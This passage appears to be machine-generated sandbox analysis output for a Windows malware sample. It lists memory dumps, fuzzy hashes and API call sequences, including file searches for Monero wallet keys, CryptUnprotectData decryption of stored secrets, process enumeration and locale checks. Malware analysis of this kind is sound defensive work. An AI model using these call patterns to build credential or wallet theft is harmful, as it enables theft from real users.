                                • Opcode Fuzzy Hash: f3a0de8a7192376be8c2d57a21fcf6d5a837e6d24efa5755a30c7d7a6efabc1f
                                • Instruction Fuzzy Hash: 26F191719241289ADF15FB60DC95EEE7378BF15300F4041DAB51A66092EF306F8ADFA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: u_$ r4g$(kx$7w$7w$;'7$Xl[$d:k'$e#$sw
                                • API String ID: 0-1729287021
                                • Opcode ID: ac5ae8a139126864980f166dc6e7eee5be5d729fd9469a23e02d2e06bc8b81fc
                                • Instruction ID: e8c414d187667390aeead5830a70019f7a5aadf1998e2614f2a8b0e275d240dd
                                • Opcode Fuzzy Hash: ac5ae8a139126864980f166dc6e7eee5be5d729fd9469a23e02d2e06bc8b81fc
                                • Instruction Fuzzy Hash: 79B20AF3A08204AFE3046E2DEC8567ABBE9EFD4720F1A853DE6C4C7744E63558058697
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000A14B0,000A0C2A), ref: 0008DAEB
                                • StrCmpCA.SHLWAPI(?,000A14B4), ref: 0008DB33
                                • StrCmpCA.SHLWAPI(?,000A14B8), ref: 0008DB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0008DDCC
                                • FindClose.KERNEL32(000000FF), ref: 0008DDDE
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: 45a33dbe8b6dc25ccca459e9e035aabeae628abe7acacdb18343a7d53927abed
                                • Instruction ID: 327a6f51d0521cd1beae36e7ed03c7cc846d7e005170c4ca4bb0bed9772ca8fa
                                • Opcode Fuzzy Hash: 45a33dbe8b6dc25ccca459e9e035aabeae628abe7acacdb18343a7d53927abed
                                • Instruction Fuzzy Hash: 6D912172A1011897CF14FBB0EC5ADEE737DBB85300F408659B94A96182EE349B09DBD2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: oU$6f~$3tV$4<GF$5p$Yq=$*]=$?~{$f\
                                • API String ID: 0-3202645899
                                • Opcode ID: 060f0172e1cf0b8b787676cfd36e048bc6f3a8bb4204e76a8027fb7038e2ff15
                                • Instruction ID: 2263ce1220a6657b6a5ff233042d326c15f689e981d2fe1e71fb3beb5862d599
                                • Opcode Fuzzy Hash: 060f0172e1cf0b8b787676cfd36e048bc6f3a8bb4204e76a8027fb7038e2ff15
                                • Instruction Fuzzy Hash: CBB229F3A082009FE704AE2DDC8567ABBEAEFD4720F16853DEAC5C7744E63558058693
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ,Qz$7Ro=$:}}7$R]oa$S1k$YK\$d3,?$d3,?
                                • API String ID: 0-3914816958
                                • Opcode ID: 5367afbc1d09fd3f9191b4ad6aa1dada7cd7b1f7e1d002867207f881339947ef
                                • Instruction ID: 243468736d52e1dd277f705dfd2dc26a254b6304bae51b7c28027fb30f7dc97e
                                • Opcode Fuzzy Hash: 5367afbc1d09fd3f9191b4ad6aa1dada7cd7b1f7e1d002867207f881339947ef
                                • Instruction Fuzzy Hash: 5DB218F3A082049FE304AE2DEC8577AFBEAEF94720F1A853DE6C4C3744E57558058696
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,000A05AF), ref: 00097BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00097BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00097C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00097C62
                                • LocalFree.KERNEL32(00000000), ref: 00097D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: 81166046b76b0cb69d5a1ea2eab6c255d183ea6b8b1b6a2b9a319fb7a0d2b7c2
                                • Instruction ID: 07cb86b741787c115480b0ffb1b5d5c5a2381c1c5d1427cb1d921ace4a507326
                                • Opcode Fuzzy Hash: 81166046b76b0cb69d5a1ea2eab6c255d183ea6b8b1b6a2b9a319fb7a0d2b7c2
                                • Instruction Fuzzy Hash: AF412B71951218ABDF24DB94DC99BEEB3B4FF44700F204199E10966191DB342F85DFA1
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,000A0D73), ref: 0008E4A2
                                • StrCmpCA.SHLWAPI(?,000A14F8), ref: 0008E4F2
                                • StrCmpCA.SHLWAPI(?,000A14FC), ref: 0008E508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0008EBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: 11a605ee506d1920a2818185598b50d551986f91ecfaf2f786b8a4e9a60723e0
                                • Instruction ID: d3efdca41f8e1e66c50a18dd04c21ce4823f7f53fccc19982cf5cb1acbd87cae
                                • Opcode Fuzzy Hash: 11a605ee506d1920a2818185598b50d551986f91ecfaf2f786b8a4e9a60723e0
                                • Instruction Fuzzy Hash: 94120F71A101189ADF18FBB0DC96EEE7379BF55300F4045A9B50A96092EF306F49DBE2
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0008C871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0008C87C
                                • lstrcat.KERNEL32(?,000A0B46), ref: 0008C943
                                • lstrcat.KERNEL32(?,000A0B47), ref: 0008C957
                                • lstrcat.KERNEL32(?,000A0B4E), ref: 0008C978
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: 33f869ee3c16ba549bbbc322e85b7dcd84456890d020b74584f5688d3d7f93b0
                                • Instruction ID: b8d62a99604e1fc8505981b4efffdf2f7ebd408aeca9b5dfe29f4047113e368d
                                • Opcode Fuzzy Hash: 33f869ee3c16ba549bbbc322e85b7dcd84456890d020b74584f5688d3d7f93b0
                                • Instruction Fuzzy Hash: 12415D7591421EDBDB10DFA4DD8DFEEB7B8BB48704F1041A8E509A6280D7705A84CFA1
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 0009696C
                                • sscanf.NTDLL ref: 00096999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000969B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000969C0
                                • ExitProcess.KERNEL32 ref: 000969DA
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: e08513a433fbdb050d94e147d75e71f92704544db75523194b8c635db61074a2
                                • Instruction ID: 553691634105c9edbc89f06f25b3688f270dd69b7f57c09778d9b8ef7790c18a
                                • Opcode Fuzzy Hash: e08513a433fbdb050d94e147d75e71f92704544db75523194b8c635db61074a2
                                • Instruction Fuzzy Hash: 3721CB75D1420CABCF04EFE4E9499EEB7B9BF48304F04852AE506E3250EB355609DBA9
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0008724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00087254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00087281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 000872A4
                                • LocalFree.KERNEL32(?), ref: 000872AE
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 58c29c7ca52253026c4cabb1ac25f5777bf83710273d2d443fed6b404dda830c
                                • Instruction ID: 6baab73669f6eb53c19e37e24e0913d04fe4b88bb647246a582df4924e9b6cee
                                • Opcode Fuzzy Hash: 58c29c7ca52253026c4cabb1ac25f5777bf83710273d2d443fed6b404dda830c
                                • Instruction Fuzzy Hash: 3F011275A40208BBEB10DFE4DD4AF9D77B8FB44704F104155FB05AB2C0D670AA008B65
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0009961E
                                • Process32First.KERNEL32(000A0ACA,00000128), ref: 00099632
                                • Process32Next.KERNEL32(000A0ACA,00000128), ref: 00099647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 0009965C
                                • CloseHandle.KERNEL32(000A0ACA), ref: 0009967A
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 7757566010108f417a7abe5d36587dc775015db55e9605541bc31bbec28cd01b
                                • Instruction ID: 0b66e62a007652c1e98bd5b7b0b0b0091a34d21ec5c262e12fba75dd7fb5a12b
                                • Opcode Fuzzy Hash: 7757566010108f417a7abe5d36587dc775015db55e9605541bc31bbec28cd01b
                                • Instruction Fuzzy Hash: AD010C75A00208EBCF24DFA5DD48FEDBBF8FB48304F104288A90696240D7349B44DF51
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Njr$PZ{/$bAg_$fAg_
                                • API String ID: 0-991460530
